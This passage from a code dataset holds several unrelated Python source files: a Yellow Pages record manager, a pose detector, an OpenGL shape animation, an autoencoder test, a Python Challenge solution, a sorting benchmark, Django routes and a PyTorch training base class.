headers=database['columns'], tablefmt=\"github\"))\n                    \n                    # notification that data 'Data successfully saved!'\n                    print('\\nData successfully saved!\\n')\n                    \n                    # datetime object containing current date and time\n                    now = datetime.now()\n                    # dd/mm/YY H:M:S\n                    dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n                    # write record.txt\n                    file = open(pathRecord, 'a')\n                    file.write(f'(ADD) User has added data with ID number {userInputIndex} at {dt_string}\\n')\n                    file.close()\n                else:\n                    print('\\nOkey double check your input data!')\n        \n        # back to Main Menu\n        else:\n            break\n    \n    # keep database up to date\n    return database\n\n\n# delete data\ndef deleteMenu(database, pathRecord, pathCsv):\n    \"\"\"Function to delete data in your database\n\n    Args:\n        database (dict): the database to process\n        pathRecord: variable that stored your path of record file\n        pathCsv : variable that stored your path of csv file\n    \n    Returns:\n        database: latest database\n    \"\"\"\n\n    # select delete menu\n    while True:\n        # read latest database\n        readCsv(pathCsv)\n\n        # list of data\n        data = list(database.values())[1:]\n\n        # available ID\n        choices = [data[index][0] for index in range(len(data))]\n\n        # run sub-delete menu\n        choices1 = ['Delete data in Yellow Pages database', 'Back to Main Menu']\n        userInput = pyip.inputMenu(prompt='Select Delete Menu:\\n', choices=choices1, numbered=True)\n        if userInput == 'Delete data in Yellow Pages database':\n            # ask the user how many IDs they want to delete\n            userInput1 = pyip.inputChoice(prompt='How many IDs do you want to delete ?\\nPlease select one of: one or more than one ? ', \n                                        choices=['one', 'more than one'])\n            \n            # if the user wants to delete only one ID\n            if userInput1 == 'one':\n                userInput2 = pyip.inputInt(prompt='Enter ID that you want to delete in database:')\n                if userInput2 in choices:\n                    # display data that you want to delete in tabular format\n                    print(tabulate.tabulate(list([database[str(userInput2)]]), headers=database['columns'], tablefmt=\"github\"))\n                    # Ask the user whether to delete or not\n                    deletingMenuInput = pyip.inputYesNo(prompt='Are you sure you want to delete the data ? (Yes/No):')\n                    # if 'Yes' delete data from database\n                    if deletingMenuInput == 'yes':\n                        del database[str(userInput2)]\n                        # show database after data is deleted\n                        print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n                        \n                        # run writeCsv function\n                        writeCsv(database, pathCsv)\n\n                        # notification that data 'Data successfully deleted!'\n                        print('\\nData successfully deleted!')\n\n                        # datetime object containing current date and time\n                        now = datetime.now()\n                        # dd/mm/YY H:M:S\n                        dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n                        # write record.txt\n                        file = open(pathRecord, 'a')\n                        file.write(f'(DELETE) User has deleted data with ID number {userInput2} at {dt_string}\\n')\n                        file.close()\n                    \n                    else:\n                        print('Okey double check your input!\\n')\n                else:\n                    print(\"ID doesn't exist!\")\n\n            # if the user wants to delete more than one ID\n            else:\n\n                # list of data\n                data = list(database.values())[1:]\n\n                # available ID\n                choices2 = [data[index][0] for index in range(len(data))]\n\n                # ask the user for the exact number of IDs they want to delete\n                userInput3 = pyip.inputInt(prompt='Specify the exact number of IDs that you want to delete:\\n', greaterThan=1, lessThan=len(data))\n                # store the IDs that the user wants to delete in a variable\n                userInput4 = []\n                for i in range(userInput3):\n                    userInput5 = pyip.inputMenu(prompt=f'Enter ID #{i+1} that you want to delete: \\nThese are the available IDs:\\n', \n                                                choices=valueInttoStr(choices2), lettered=True)\n                    # in order to show the data that the user wants to delete\n                    userInput4.append(userInput5)\n                    # Remove the ID from the list of available IDs once it has been selected, so that the user does not enter duplicates \n                    choices2.remove(int(userInput5))\n\n                # display the IDs that the user wants to delete\n                displayDeleteData = [database[i] for i in userInput4]\n                print(tabulate.tabulate(displayDeleteData, headers=database['columns'], tablefmt=\"github\"))\n\n                # Ask the user whether to delete or not\n                deletingMenuInput = pyip.inputYesNo(prompt='Are you sure you want to delete the data ? (Yes/No):\\n')\n                # if 'Yes' delete data from database\n                if deletingMenuInput == 'yes':\n                    # delete multiple ID\n                    for i in userInput4:\n                        del database[str(i)]\n                    # show database after data is deleted\n                    print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n\n                    # notification that data 'Data successfully deleted!'\n                    print('\\nData successfully deleted!')\n\n                    # datetime object containing current date and time\n                    now = datetime.now()\n                    # dd/mm/YY H:M:S\n                    dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n                    # write record.txt\n                    file = open(pathRecord, 'a')\n                    file.write(f\"(DELETE) User has deleted data with ID number {','.join(userInput4)} at {dt_string}\\n\")\n                    file.close()\n                \n                else:\n                    print('Okey double check your input!\\n')\n        # Back to main menu\n        else:\n            break\n    # keep database up to date\n    return database\n\n\n# update data\ndef updateMenu(database, pathRecord):\n    \"\"\"Function to update certain column and ID of your data in database\n\n    Args:\n        database (dict): the database to process\n        pathRecord: variable that stored your path of record file\n    \n    Returns:\n        database: latest database\n    \"\"\"\n    # list of data\n    data = list(database.values())[1:]\n\n    # available ID\n    choices = [data[index][0] for index in range(len(data))]\n\n    # select update menu\n    while True:\n        choices1 = ['Edit data in Yellow Pages database', 'Back to Main Menu']\n        userInput = pyip.inputMenu(prompt='Select Update Menu:\\n', choices=choices1, numbered=True)\n        if userInput == 'Edit data in Yellow Pages database':\n            userInputIndex = pyip.inputInt(prompt='Which ID do you want to update ?\\n')\n            # if userInputIndex does exist in database\n            if userInputIndex in choices:\n                # show the row that the user wants to update\n                print(tabulate.tabulate(list([database[str(userInputIndex)]]), headers=database['columns'], tablefmt=\"github\"))\n                updateMenuInput = pyip.inputYesNo(prompt='\\nDo you want to continue to update the data ? (Yes/No):') \n                if updateMenuInput == 'yes':\n                    # print columns options\n                    userInputColumn = pyip.inputMenu(prompt='Which column do you want to update ?\\n', choices=database['columns'][1:], numbered=True) # output string\n                    # if the user selects a column that contains integer data type (phoneNumber)\n                    if type(database[str(userInputIndex)][database['columns'].index(userInputColumn)]) == int:\n                        # number of digits of phone number must be less than or equal to 11 digits\n                        while True:\n                            database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputInt(prompt='Enter new value:')\n                            if len(str(database[str(userInputIndex)][database['columns'].index(userInputColumn)])) <= 11:\n                                break\n                            else:\n                                print(\"number of digits of the phone number must be less than or equal to 11 digits\") \n                    # if user choose 'Email' column\n                    elif userInputColumn == 'Email':\n                        database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputEmail(prompt='Enter new value: ')\n                    # if the user selects a column that contains string data type\n                    else:\n                        database[str(userInputIndex)][database['columns'].index(userInputColumn)] = pyip.inputStr(prompt='Enter new value:', applyFunc=lambda x: x.title(), blockRegexes='1234567890@')\n                    # show updated row\n                    print(tabulate.tabulate(list([database[str(userInputIndex)]]), headers=database['columns'], tablefmt=\"github\"))\n                    # Update data or not ?\n                    updateMenuInput1 = pyip.inputYesNo(prompt='\\nAre you sure you want to update the data ? 
(Yes/No):') \n if updateMenuInput1 == 'yes':\n # show updated database\n print(tabulate.tabulate(list(database.values())[1:], headers=database['columns'], tablefmt=\"github\"))\n \n # notification that data 'Data successfully updated!'\n print('\\nData successfully updated!\\n')\n\n # datetime object containing current date and time\n now = datetime.now()\n # dd/mm/YY H:M:S\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n\n # write record.txt\n file = open(pathRecord, 'a')\n file.write(f\"(UPDATE) User has updated data with ID number {userInputIndex} in the {userInputColumn} column, then change the value into {database[str(userInputIndex)][database['columns'].index(userInputColumn)]} at {dt_string}\\n\")\n file.close()\n \n else:\n print('Okey double check again your input data!\\n') \n # user does not continue to update data\n else:\n print('\\nOkey double check your input data!')\n # if ID doesnt exist \n else:\n print(\"The data you're looking for doesn't exist\\n\")\n # Back to main Menu\n else:\n break\n\n # keep database up to date\n return database","repo_name":"fnkhairudin/YellowPages","sub_path":"YellowPages.py","file_name":"YellowPages.py","file_ext":"py","file_size_in_byte":23764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37027678433","text":"import mediapipe as mp\r\nimport math\r\nimport cv2\r\n\r\nclass poseDetector():\r\n def __init__(self,\r\n staticMode=False,\r\n model_complexity=False,\r\n smooth=True,\r\n minDetectionCon=0.5,\r\n minTrackCon=0.5):\r\n\r\n self.staticMode = staticMode\r\n self.modelComplexity = model_complexity\r\n self.smooth = smooth\r\n self.minDetectionCon = minDetectionCon\r\n self.minTrackCon = minTrackCon\r\n\r\n self.mpDraw = mp.solutions.drawing_utils\r\n self.mpPose = mp.solutions.pose\r\n self.pose = self.mpPose.Pose(static_image_mode=self.staticMode, model_complexity=self.modelComplexity,\r\n smooth_landmarks=self.smooth,\r\n min_detection_confidence=self.minDetectionCon,\r\n min_tracking_confidence=self.minTrackCon)\r\n self.drawLandmarkSpec = self.mpDraw.DrawingSpec(\r\n thickness=2, circle_radius=2, color=(255,0,0))\r\n self.drawConnectionSpec = self.mpDraw.DrawingSpec(\r\n thickness=2, color=(34,247,10))\r\n\r\n\r\n def find_Person(self, frame, draw=True):\r\n self.imgRGB = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n self.results = self.pose.process(self.imgRGB)\r\n if self.results.pose_landmarks and draw:\r\n self.mpDraw.draw_landmarks(frame, self.results.pose_landmarks,\r\n self.mpPose.POSE_CONNECTIONS, self.drawLandmarkSpec, self.drawConnectionSpec)\r\n return frame\r\n\r\n def find_landmarks(self, frame, draw=True):\r\n self.landmark_list=[]\r\n if self.results.pose_landmarks:\r\n for id, lm in enumerate(self.results.pose_landmarks.landmark):\r\n h,w,c = frame.shape\r\n cx, cy = int(lm.x * w), int(lm.y * h)\r\n self.landmark_list.append([id, cx, cy])\r\n if draw:\r\n cv2.circle(frame, (cx, cy), 5, (255, 0, 0), cv2.FILLED)\r\n return self.landmark_list\r\n\r\n def find_angle(self, frame, p1, p2, p3, draw=True):\r\n # Get the landmarks\r\n x1, y1 = self.landmark_list[p1][1:]\r\n x2, y2 = self.landmark_list[p2][1:]\r\n x3, y3 = self.landmark_list[p3][1:]\r\n # Calculate the Angle\r\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) -\r\n math.atan2(y1 - y2, x1 - x2))\r\n if angle < 0:\r\n angle += 360\r\n print(\"ANGLE\")\r\n print(angle)\r\n\r\n # Draw\r\n if draw:\r\n cv2.line(frame, (x1, y1), (x2, y2), (255, 255, 255), 5)\r\n cv2.line(frame, (x3, y3), (x2, y2), 
(255, 255, 255), 5)\r\n cv2.circle(frame, (x1, y1), 11, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x1, y1), 16, (255, 60, 0), 2)\r\n cv2.circle(frame, (x2, y2), 10, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x2, y2), 16, (255, 60, 0), 2)\r\n cv2.circle(frame, (x3, y3), 11, (0, 0, 255), cv2.FILLED)\r\n cv2.circle(frame, (x3, y3), 16, (255, 60, 0), 2)\r\n\r\n cv2.putText(frame, str(int(angle)), (x3 - 50, y3 + 60),\r\n cv2.FONT_HERSHEY_DUPLEX, 1, (255, 255, 255), 1)\r\n return angle\r\n\r\ndef main():\r\n cap = cv2.VideoCapture('TrainerData/curls.mp4')\r\n detector = poseDetector()\r\n while True:\r\n success, frame = cap.read()\r\n #frame = cv2.imread(\"TrainerData/bicep_curls.jpeg\")\r\n frame = detector.find_Person(frame)\r\n landmark_list = detector.find_landmarks(frame, draw=True)\r\n print(landmark_list)\r\n if len(landmark_list) != 0:\r\n print(landmark_list[16])\r\n cv2.circle(\r\n frame, (landmark_list[16][1], landmark_list[16][2]), 15, (0, 0, 255), cv2.FILLED)\r\n\r\n cv2.imshow(\"Image\", frame)\r\n key = cv2.waitKey(1)\r\n if key == ord('q'):\r\n break\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"alazimariff/pythonAiTrainer","sub_path":"PoseModule.py","file_name":"PoseModule.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27272030292","text":"from OpenGL.GL import *\nfrom curs.constants import *\nfrom PIL import Image\nimport numpy\n\nW = 0.2\nN = 6\n\nV = [[-W, +W, +W], # 0\n [-W, +W, -W], # 1\n [+W, +W, -W], # 2\n [+W, +W, +W], # 3\n [0, 0, 0], # 4\n [-W, -W, +W], # 5\n [-W, -W, -W], # 6\n [+W, -W, -W], # 7\n [+W, -W, +W]] # 8\n\nT_PLANES = [\n (V[0], V[1], V[4]),\n (V[1], V[6], V[4]),\n (V[6], V[5], V[4]),\n (V[5], V[0], V[4]),\n #\n (V[3], V[2], V[4]),\n (V[2], V[7], V[4]),\n (V[7], V[8], V[4]),\n (V[8], V[3], V[4]),\n #\n #\n (V[0], V[1], V[4]),\n (V[1], V[2], V[4]),\n (V[2], V[3], V[4]),\n (V[3], V[0], V[4]),\n #\n (V[7], V[8], V[4]),\n (V[6], V[7], V[4]),\n (V[5], V[6], V[4]),\n (V[8], V[5], V[4])\n]\n\nQ_PLANES = [\n (V[0], V[3], V[8], V[5]), # 1\n (V[0], V[1], V[6], V[5]), # 2\n (V[1], V[2], V[7], V[6]), # 3\n (V[2], V[3], V[8], V[7]), # 4\n]\n\n\nclass NotConvex:\n\n def __init__(self):\n self.t = 0.0\n self.is_rotated = False\n self.rotation_times = 0\n self.change_direction_times = 0\n self.unit = 1\n self.update(self.unit)\n self.rotation_limit = N\n\n def draw(self):\n glMaterialfv(GL_FRONT_AND_BACK, GL_DIFFUSE, WHITE)\n if not self.is_rotated:\n if self.rotation_times == N or self.rotation_times == N * 2:\n self.change_direction()\n self.rotate(self.unit)\n else:\n self.update(self.unit)\n # glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)\n glBegin(GL_TRIANGLES)\n for plane in T_PLANES:\n for vertex in plane:\n D = numpy.sqrt(pow(vertex[0], 2) + pow(vertex[1], 2) + pow(vertex[2], 2))\n normale_x = vertex[0] - V[4][0]\n normale_y = vertex[1] - V[4][1]\n normale_z = vertex[2] - V[4][2]\n glNormal3f(normale_x, normale_y, normale_z)\n glVertex3f(vertex[0], vertex[1], vertex[2])\n glEnd()\n\n # glBegin(GL_QUADS)\n # for plane in Q_PLANES:\n # for vertex in plane:\n # print(vertex)\n # glNormal3f(vertex[0], vertex[1], vertex[2])\n # glVertex3f(vertex[0], vertex[1], vertex[2])\n # glEnd()\n glMaterialfv(GL_FRONT_AND_BACK, GL_DIFFUSE, (0, 0, 0, 0))\n\n def position(self, t=0):\n self.t = t\n\n def change_direction(self):\n self.change_direction_times += 1\n self.rotation_times = 1\n self.is_rotated = False\n self.unit += 1\n\n def rotate(self, 
unit):\n if unit == 1:\n self.rotateXY()\n if unit == 2:\n self.rotateYZ()\n if unit == 3:\n self.rotateXY2()\n\n def rotateXY(self, direction=1):\n x0 = V[5][0]\n y0 = V[5][1]\n for i in range(len(V)):\n if (i == 5 or i == 6):\n continue\n vertex = V[i]\n x = vertex[0]\n y = vertex[1]\n R = numpy.sqrt(pow(x - x0, 2) + pow(y - y0, 2))\n angle = numpy.arccos((x - x0) / R)\n new_angle = angle + self.t\n # if i == 0 and angle >= numpy.pi / 2:\n # self.t += 0.005 * (self.unit * self.rotation_limit + self.rotation_times)\n if new_angle >= numpy.pi:\n self.is_rotated = True\n break\n new_x = x0 + direction * R * numpy.cos(new_angle)\n new_y = y0 + R * numpy.sin(new_angle)\n vertex[0] = new_x\n vertex[1] = new_y\n\n def rotateXY2(self):\n x0 = V[8][0]\n y0 = V[8][1]\n for i in range(len(V)):\n if (i == 8 or i == 7):\n continue\n vertex = V[i]\n x = vertex[0]\n y = vertex[1]\n R = numpy.sqrt(pow(x - x0, 2) + pow(y - y0, 2))\n angle = numpy.arccos((x - x0) / R)\n if i == 0 and angle <= 2 * numpy.pi / 3:\n self.t += 0.05\n new_angle = angle - self.t\n if new_angle <= 0:\n self.is_rotated = True\n break\n new_x = x0 + R * numpy.cos(new_angle)\n new_y = y0 + R * numpy.sin(new_angle)\n vertex[0] = new_x\n vertex[1] = new_y\n\n def rotateYZ(self):\n y0 = V[8][1]\n z0 = V[8][2]\n for i in range(len(V)):\n if (i == 5 or i == 8):\n continue\n vertex = V[i]\n y = vertex[1]\n z = vertex[2]\n R = numpy.sqrt(pow(y - y0, 2) + pow(z - z0, 2))\n angle = numpy.arccos((z0 - z) / R)\n if i == 0 and angle >= numpy.pi / 3:\n self.t += 0.01\n new_angle = angle + self.t\n if new_angle >= numpy.pi:\n self.is_rotated = True\n break\n new_y = y0 + R * numpy.sin(new_angle)\n new_z = z0 - R * numpy.cos(new_angle)\n vertex[1] = new_y\n vertex[2] = new_z\n\n def update(self, unit):\n global V\n global T_PLANES\n V = [[-W, +W, +W], # 0\n [-W, +W, -W], # 1\n [+W, +W, -W], # 2\n [+W, +W, +W], # 3\n [0, 0, 0], # 4\n [-W, -W, +W], # 5\n [-W, -W, -W], # 6\n [+W, -W, -W], # 7\n [+W, -W, +W]] # 8\n for v in V:\n if unit == 1:\n v[0] -= W * 2 * self.rotation_times\n if unit == 2:\n v[0] -= W * 2 * (N - 1)\n v[2] += W * 2 * self.rotation_times\n if unit == 3:\n v[0] -= W * 2 * (N - 1) - W * 2 * self.rotation_times\n v[2] += W * 2 * (N - 1)\n\n T_PLANES = [\n (V[0], V[1], V[4]),\n (V[1], V[6], V[4]),\n (V[6], V[5], V[4]),\n (V[5], V[0], V[4]),\n #\n (V[3], V[2], V[4]),\n (V[2], V[7], V[4]),\n (V[7], V[8], V[4]),\n (V[8], V[3], V[4]),\n #\n #\n (V[0], V[1], V[4]),\n (V[1], V[2], V[4]),\n (V[2], V[3], V[4]),\n (V[3], V[0], V[4]),\n #\n (V[7], V[8], V[4]),\n (V[6], V[7], V[4]),\n (V[5], V[6], V[4]),\n (V[8], V[5], V[4])\n ]\n self.is_rotated = False\n self.rotation_times += 1\n","repo_name":"veronikaKochugova/OpenGL","sub_path":"curs/NotConvex.py","file_name":"NotConvex.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22242061338","text":"\nimport cv2\nfrom visualize import visualize, show_image\nfrom load_dataset import load_image\nfrom keras.models import load_model\nimport matplotlib.pyplot as plt\n\n# Load autoencoder model\nautoencoder_faces = load_model('models/faces/faces.h5')\nautoencoder_cocoon = load_model('models/cocoon/cocoon.h5')\nprint(autoencoder_faces.summary())\nprint(autoencoder_cocoon.summary())\n\n# Testing\ntst_img = load_image(\"test_images/selfie.webp\")\ntst_img = tst_img.astype('float32')/255.0 - 0.5\ntst_img_32 = cv2.resize(tst_img, (32, 32))\ntst_img_32 = cv2.resize(tst_img, (32, 32))\nout1 = 
autoencoder_faces.predict(tst_img_32[None])[0]\nout2 = autoencoder_cocoon.predict(tst_img_32[None])[0]\n#visualize(tst_img,encoder,decoder)\n\nplt.subplot(2,2,1)\nplt.title(\"Original\")\nshow_image(tst_img_32)\n\nplt.subplot(2,2,2)\nplt.title(\"Reconstructed\")\nshow_image(out1)\n\nplt.subplot(2,2,3)\n#plt.title(\"Original\")\nshow_image(tst_img_32)\n\nplt.subplot(2,2,4)\n#plt.title(\"Reconstructed\")\nshow_image(out2)\nplt.show()","repo_name":"dvillacis/objeto_selfie","sub_path":"test_autoencoder.py","file_name":"test_autoencoder.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34205031945","text":"\"\"\"\nhttp://huge:file@www.pythonchallenge.com/pc/return/evil.html\n\"\"\"\nfrom io import BytesIO\n\nimport requests\nfrom PIL import Image\n\nDATA = \"http://huge:file@www.pythonchallenge.com/pc/return/evil2.gfx\"\n\n\ndef solve():\n data = requests.get(DATA).content\n\n for offset in range(5):\n img_data = bytes(b for b in data[offset::5])\n Image.open(BytesIO(img_data)).show()\n\n\nif __name__ == \"__main__\":\n solve()\n","repo_name":"arjandepooter/python-challenge","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3985111855","text":"import os\nimport random\nimport time\nimport matplotlib.pyplot as plt\nimport subprocess\nimport sys\n\ndata_sizes = [10000, 50000, 100000, 200000, 300000, 400000,\n 500000, 600000, 700000, 800000, 900000, 1000000]\nsort_times = {'heap_sort': [], 'merge_sort': [],\n 'quick_sort': [], 'shell_sort': []}\n\n\ndef compile_exe(sort_name: str) -> None:\n path = './src/{}.cpp'.format(sort_name)\n os.system('g++ -o ./exe/{} {}'.format(sort_name, path))\n\n\ndef call_exe(sort_name: str, random_data: list[int]) -> float:\n path = './exe/{}.exe'.format(sort_name)\n\n start_time = time.time()\n out = subprocess.Popen(path, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n out = out.communicate(input=' '.join(\n [str(i) for i in random_data]).encode('utf-8'))[0]\n end_time = time.time()\n\n out = out.decode('utf-8').split()\n out = [int(i) for i in out]\n if not check_sorted(out):\n print('Error: {} is not sorted!'.format(sort_name))\n sys.exit(1)\n\n return end_time - start_time\n\n\ndef check_sorted(data: list) -> bool:\n for i in range(len(data) - 1):\n if data[i] > data[i + 1]:\n return False\n return True\n\n\ndef generate_random_data(data_size: int) -> list[int]:\n data = [i for i in range(data_size)]\n random.shuffle(data)\n return data\n\n\ndef paint_data() -> None:\n for sort_name in sort_times.keys():\n plt.plot(data_sizes, sort_times[sort_name], label=sort_name)\n plt.xlabel('data size')\n plt.ylabel('running time')\n plt.title('running time of different sorting algorithms')\n plt.legend()\n plt.savefig('running_time.png')\n\ndef main() -> None:\n for sort_name in sort_times.keys():\n compile_exe(sort_name)\n\n for data_size in data_sizes:\n print('data size: {}'.format(data_size))\n random_data = generate_random_data(data_size)\n for sort_name in sort_times.keys():\n sort_times[sort_name].append(call_exe(sort_name, random_data))\n print('{} running time: {:.3f}'.format(sort_name, sort_times[sort_name][-1])) \n\n paint_data()\n\n\nif __name__ == '__main__': \n 
main()\n","repo_name":"fatbrother/Sorting-Graph","sub_path":"paint.py","file_name":"paint.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71526725852","text":"from django.urls import path\n\nfrom .views import getLiked, insertLiked, deleteLiked, getLikedMoive\n\nurlpatterns = [\n path('getLiked/', getLiked, name='getLiked'),\n path('insertLiked/', insertLiked, name='insertLiked'),\n path('deleteLiked/', deleteLiked, name='deleteLiked'),\n path('getLikedMoive/', getLikedMoive, name='getLikedMoive')\n]\n","repo_name":"BaeJihyun97/Movie_Recommendation","sub_path":"backend/djangoreactapi/service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69894445851","text":"import torch\nimport os\n\nfrom abc import abstractmethod\nfrom numpy import inf\nfrom utils.io import prepare_device\nfrom logger import TensorboardWriter\n\nimport models.hppw as module_arch\nimport models.hppw as module_metric\nimport models.hppw as module_loss\nfrom models.projection.model import LinearProjection\nfrom utils.io import MetricTracker\n\nimport wandb\n\n\n\nclass BaseTrainer:\n \"\"\"\n Base class for all trainers\n \"\"\"\n def __init__(self, config):\n\n self.config = config\n self.logger = self.config.get_logger('trainer', config['trainer']['verbosity'])\n \n cfg_trainer = config['trainer']\n self.epochs = cfg_trainer['epochs']\n self.save_period = cfg_trainer['save_period']\n self.eval_period = cfg_trainer['eval_period']\n\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.monitor_mode = 'off'\n self.monitor_best = 0\n else:\n self.monitor_mode, self.monitor_metric = self.monitor.split()\n assert self.monitor_mode in ['min', 'max']\n\n self.monitor_best = inf if self.monitor_mode == 'min' else -inf\n\n # Only enable early stopping if given and above 0\n self.early_stop = cfg_trainer.get('early_stop', inf)\n if self.early_stop <= 0:\n self.early_stop = inf # training proceeds till the very last epoch\n\n self.monitor = cfg_trainer.get('monitor', 'off')\n\n # configuration to monitor model performance and save best\n if self.monitor == 'off':\n self.monitor_mode = 'off'\n self.monitor_best = 0\n else:\n self.monitor_mode, self.monitor_metric = self.monitor.split()\n assert self.monitor_mode in ['min', 'max']\n\n self.monitor_best = inf if self.monitor_mode == 'min' else -inf\n\n # Only enable early stopping if given and above 0\n self.early_stop = cfg_trainer.get('early_stop', inf)\n if self.early_stop <= 0:\n self.early_stop = inf # training proceeds till the very last epoch\n\n self.checkpoint_dir = config.save_dir\n\n # setup visualization writer instance\n self.writer = None\n if config['tensorboard']:\n self.writer = TensorboardWriter(config.log_dir, self.logger)\n\n\n self.start_epoch = 1\n self.best_epoch = 1\n self.best_epoch = 1\n self.current_epoch = 1\n self.best_top1 = 0\n\n # prepare for (multi-device) GPU training\n # This part doesn't do anything if you don't have a GPU.\n self._device, self._device_ids = prepare_device(config['n_gpu'])\n self.wandb_enabled = config['wandb']\n if self.wandb_enabled:\n self.wandb = wandb\n\n self.wandb.login()\n self.wandb.init(project=\"human-pose-prediction-in-the-wild\")\n \n self.model = config.init_obj('arch', module_arch)\n 
self.model_proj = LinearProjection(**config[\"arch3d\"])\n self.model.to(self._device)\n if len(self._device_ids) > 1:\n self.model = torch.nn.DataParallel(self.model, device_ids=self._device_ids)\n\n # Simply Log the model (enable if you want to see the model architecture)\n # self.logger.info(self.model)\n # Prepare Losses\n # self.criterion = getattr(module_loss, config['loss'])\n self.criterion = getattr(module_loss, config['loss'][\"type\"])\n # Prepare Optimizer\n trainable_params = filter(lambda p: p.requires_grad, self.model.parameters())\n self.optimizer = config.init_obj('optimizer', torch.optim, trainable_params)\n self.lr_scheduler = config.init_obj('lr_scheduler', torch.optim.lr_scheduler, self.optimizer) \n \n self.metric_ftns = [getattr(module_metric, met['type'])(**met['args']) for met in config['metrics']]\n self.epoch_metrics = MetricTracker(keys=['loss2d'] + [str(m) for m in self.metric_ftns], writer=self.writer)\n self.eval_metrics = MetricTracker(keys=['loss2d'] + [str(m) for m in self.metric_ftns], writer=self.writer)\n \n @abstractmethod\n def _train_epoch(self):\n \"\"\"\n Training logic for an epoch. Only takes care of doing a single training loop.\n\n :return: A dict that contains average loss and metric(s) information in this epoch.\n \"\"\"\n raise NotImplementedError\n\n def train(self):\n \"\"\"\n Full training logic\n \"\"\"\n\n self.not_improved_count = 0\n prev_metric_value = 999999999999999 if self.monitor_mode == \"min\" else 0 \n if self.wandb_enabled: wandb.watch(self.model, self.criterion, log='all')\n states = {\"loss2d\": {\"train\": [], \"val\": []}, \"loss3d\": {\"train\": [], \"val\": []}}\n for epoch in range(self.start_epoch, self.epochs + 1):\n \n if epoch % self.curriculum[\"duration\"] == 0:\n \n self.future_window += self.curriculum[\"step\"]\n self.history_window += self.curriculum[\"step\"]\n \n if self.history_window > self.max_history_window:\n self.history_window = self.max_history_window\n \n if self.future_window > self.max_future_window:\n self.future_window = self.max_future_window\n \n self.logger.info(f\"Setting curriculum to history window: {self.history_window}, future window: {self.future_window}\") \n\n \n self.current_epoch = epoch\n train_result = self._train_epoch()\n states[\"loss2d\"][\"train\"].append(train_result[\"loss2d\"])\n if self.use_projection:\n states[\"loss3d\"][\"train\"].append(train_result[\"loss3d\"])\n # save logged informations into log dict\n log = {'epoch': self.current_epoch}\n log.update(train_result)\n\n if self._do_evaluate():\n eval_result = self.evaluate(history_window=self.history_window, future_window=self.future_window)\n states[\"loss2d\"][\"val\"].append(eval_result[\"loss2d\"])\n if self.use_projection:\n states[\"loss3d\"][\"val\"].append(eval_result[\"loss3d\"])\n # save eval information to the log dict as well\n log.update({f'eval_{key}': value for key, value in eval_result.items()})\n if self.wandb_enabled:\n self.wandb.log(log)\n\n\n\n if self.monitor_mode != 'off' : # Then there is a metric to monitor\n if self.monitor_metric in log: # Then we have measured it in this epoch\n\n \n metric_value = log[self.monitor_metric]\n if self.monitor_mode == \"min\" and metric_value < prev_metric_value:\n self.not_improved_count = 0\n path = os.path.join(self.checkpoint_dir, f'best_model.pth')\n self.save_model(path=path)\n self.logger.info(f\"Saving model with best metric at {path}\") \n prev_metric_value = metric_value\n\n elif self.monitor_mode == \"max\" and metric_value > prev_metric_value:\n 
self.not_improved_count = 0\n                        path = os.path.join(self.checkpoint_dir, f'best_model.pth')\n                        self.save_model(path=path) \n                        self.logger.info(f\"Saving model with best metric at {path}\") \n                        prev_metric_value = metric_value\n                    \n                    else:\n                        if self.early_stop:\n                            self.not_improved_count += 1\n                            if self.not_improved_count == self.early_stop:\n                                self.logger.info(f\"No improvement so far... breaking...goodbye\")\n                                break\n                            self.logger.info(f\"Patience running out... {self.not_improved_count}\") \n\n\n                else:\n                    ## The metric wasn't measured in this epoch. Don't change not_improved_count or similar things here!!!\n                    self.logger.warning(f\"Warning: At epoch {self.current_epoch} Metric '{self.monitor_metric}' wasn't measured. Not monitoring it for this epoch.\")\n            \n            # print logged information to the screen\n            for key, value in log.items():\n                self.logger.info('    {:15s}: {}'.format(str(key), value))\n\n            if self.wandb_enabled: wandb.log(log)\n\n            if self.current_epoch % self.save_period == 0:\n                # Just to regularly save the model every save_period epochs\n                path = os.path.join(self.checkpoint_dir, f'per_epoch_model.pth')\n                self.save_model(path=path)\n            self.lr_scheduler.step(eval_result[\"loss2d\"])\n        # Always save the last model\n        path = os.path.join(self.checkpoint_dir, f'last_model.pth')\n        self.save_model(path=path)\n        return states\n\n    def _do_evaluate(self):\n        \"\"\"\n        Based on the self.current_epoch and self.eval_interval, determine if we should evaluate.\n        You can take hint from saving logic implemented in BaseTrainer.train() method\n\n        returns a Boolean\n        \"\"\"\n        if self.current_epoch % self.eval_period == 0:\n            return True\n        else:\n            return False\n    \n    